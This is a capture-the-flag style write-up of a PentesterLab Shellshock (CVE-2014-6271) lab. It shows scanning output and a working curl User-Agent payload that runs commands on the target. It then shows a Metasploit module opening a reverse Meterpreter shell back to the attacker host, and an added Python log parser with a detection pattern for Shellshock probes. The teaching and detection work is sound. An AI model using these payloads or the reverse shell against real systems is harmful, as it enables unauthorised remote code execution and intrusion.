CVE-2014-6271/Shellshock
Introduction
On 24 September 2014 a vulnerability was published under the name “CVE-2014-6271”, aka “Shellshock”.
The nature of Shellshock was that with vulnerable versions of bash (the Unix Bourne-again shell) it was possible to inject code into bash through environment variables and have it execute arbitrary commands. After the first vulnerability was found, several related ones followed, and most known versions were patched.
For educational purposes I’m going to examine a virtual lab from pentesterlab.com.
The course description details the exploitation of the vulnerability CVE-2014-6271. This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.
Location
https://www.pentesterlab.com/exercises/cve-2014-6271
Enumeration
┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3

Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-08 11:35 CET
Nmap scan report for 192.168.171.3
Host is up (0.00052s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0 (protocol 2.0)
| ssh-hostkey:
|   1024 8b:4c:a0:14:1c:3c:8c:29:3a:16:1c:f8:1a:70:2a:f3 (DSA)
|   2048 d9:91:5d:c3:ed:78:b5:8c:9a:22:34:69:d5:68:6d:4e (RSA)
|_  256 b2:23:9a:fa:a7:7a:cb:cd:30:85:f9:cb:b8:17:ae:05 (ECDSA)
80/tcp open  http    Apache httpd 2.2.21 ((Unix) DAV/2)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.21 (Unix) DAV/2
|_http-title: [PentesterLab] CVE-2014-6271

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.60 seconds
I know that this machine's sole purpose is exploiting Shellshock, but I still run nikto.
┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h http://192.168.171.3
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.3
+ Target Hostname:    192.168.171.3
+ Target Port:        80
+ Start Time:         2016-11-08 14:55:04 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (Unix) DAV/2
+ Server leaks inodes via ETags, header found with file /, inode: 7866, size: 1704, mtime: Thu Sep 25 11:56:50 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ 8345 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2016-11-08 14:55:23 (GMT1) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
As you can see, the two OSVDB-112004 lines show that /cgi-bin/status has a 'shellshock' vulnerability ready to be exploited.
Now for the exploit. Because of the vulnerability I can inject code through an HTTP header and have bash execute my commands.
I can do this with something as simple as curl.
┌─[n13mant@planetmars]─[~]
└──╼ $curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /usr/bin/id' http://192.168.171.3/cgi-bin/status
uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)
As shown, I send the magic string () { :;}; in the User-Agent header (which CGI passes to bash as the HTTP_USER_AGENT environment variable), and I get remote code execution.
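Since the payload above travels in the User-Agent header and Apache's combined log format records that header, the same probe is visible in the access log after the fact. The following is an added example (not part of the original writeup or of PentesterLab's lab) of the detection side: a small parser for Apache combined-format lines that flags any request whose logged request line, Referer or User-Agent carries the bash function-import prefix "() {". The log lines it runs on are constructed for the example, not captured from the lab.

```python
"""Flag Shellshock-style probes in Apache combined-format access log lines (added example)."""
import re

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Apache escapes a double quote inside a quoted field as \", so a quoted
# field body is any run of non-quote/non-backslash characters or escapes.
_FIELD = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _FIELD + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _FIELD + r')" '
    r'"(?P<agent>' + _FIELD + r')"$'
)

# The prefix that made CVE-2014-6271 exploitable: an environment value
# starting with "() {" was parsed as a function definition and whatever
# followed the closing brace was executed. Whitespace between the tokens
# is optional, so the pattern tolerates it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Header-derived fields that mod_cgi hands to the script as environment
# variables; the request line covers the query string and method as well.
CHECKED_FIELDS = ('agent', 'referer', 'request')


def parse_combined(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def find_shellshock_probes(lines):
    """Return (client host, request line, offending field) for each line carrying the prefix.

    Unparseable lines are skipped rather than raising, so a damaged log
    does not stop the scan.
    """
    hits = []
    for line in lines:
        fields = parse_combined(line)
        if fields is None:
            continue
        for name in CHECKED_FIELDS:
            if SHELLSHOCK_RE.search(fields[name]):
                hits.append((fields['host'], fields['request'], name))
                break  # one hit per line is enough
    return hits


# Constructed sample log lines for the example (not real captured traffic).
SAMPLE_LOG = [
    r'192.168.171.2 - - [08/Nov/2016:14:55:04 +0100] "GET /cgi-bin/status HTTP/1.1" 200 1704 "-" "curl/7.50.1"',
    r'192.168.171.2 - - [08/Nov/2016:15:02:11 +0100] "GET /cgi-bin/status HTTP/1.1" 200 57 "-" '
    r'"() { :;}; echo \"Content-Type: text/plain\"; echo; /usr/bin/id"',
    r'192.168.171.2 - - [08/Nov/2016:15:03:40 +0100] "GET /index.html HTTP/1.1" 200 1704 "() { :; }; /bin/true" "Mozilla/5.0"',
    'this is not a log line',
]

if __name__ == '__main__':
    for host, request, field in find_shellshock_probes(SAMPLE_LOG):
        print(f'shellshock probe from {host}: {request!r} via {field}')
```

Matching on the function-definition prefix rather than on specific commands is deliberate: the commands after the closing brace vary from probe to probe, but every CVE-2014-6271 trigger has to begin with that prefix. On a patched bash the request still shows up in the log, so the same scan doubles as a check of whether anyone is still probing for it.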
Reverse shell
I got RCE, but to really get into the remote machine, I prefer a reverse shell.
There are several ways to get a reverse shell here. As netcat is present on the remote system, I could connect back out to a listener on my local system. I could also create a payload with msfvenom and wget it onto the remote system from a SimpleHTTPServer, or, as in this case, use Metasploit's module for this vulnerability to open the reverse shell.
       =[ metasploit v4.12.38-dev                         ]
+ -- --=[ 1594 exploits - 908 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.171.3
RHOST => 192.168.171.3
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/status/
TARGETURI => /cgi-bin/status/
msf exploit(apache_mod_cgi_bash_env_exec) > set LHOST 192.168.171.2
LHOST => 192.168.171.2
msf exploit(apache_mod_cgi_bash_env_exec) > set LPORT 31337
LPORT => 31337
msf exploit(apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 192.168.171.2:31337
[*] Command Stager progress - 100.60% done (837/832 bytes)
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.171.3
[*] Meterpreter session 1 opened (192.168.171.2:31337 -> 192.168.171.3:37867) at 2016-11-09 09:54:25 +0100

meterpreter > shell
Process 3314 created.
Channel 1 created.
/bin/sh: can't access tty; job control turned off
/var/www/cgi-bin $
There you go.
Explanation
Symantec has a really nice overview of how the exploit works.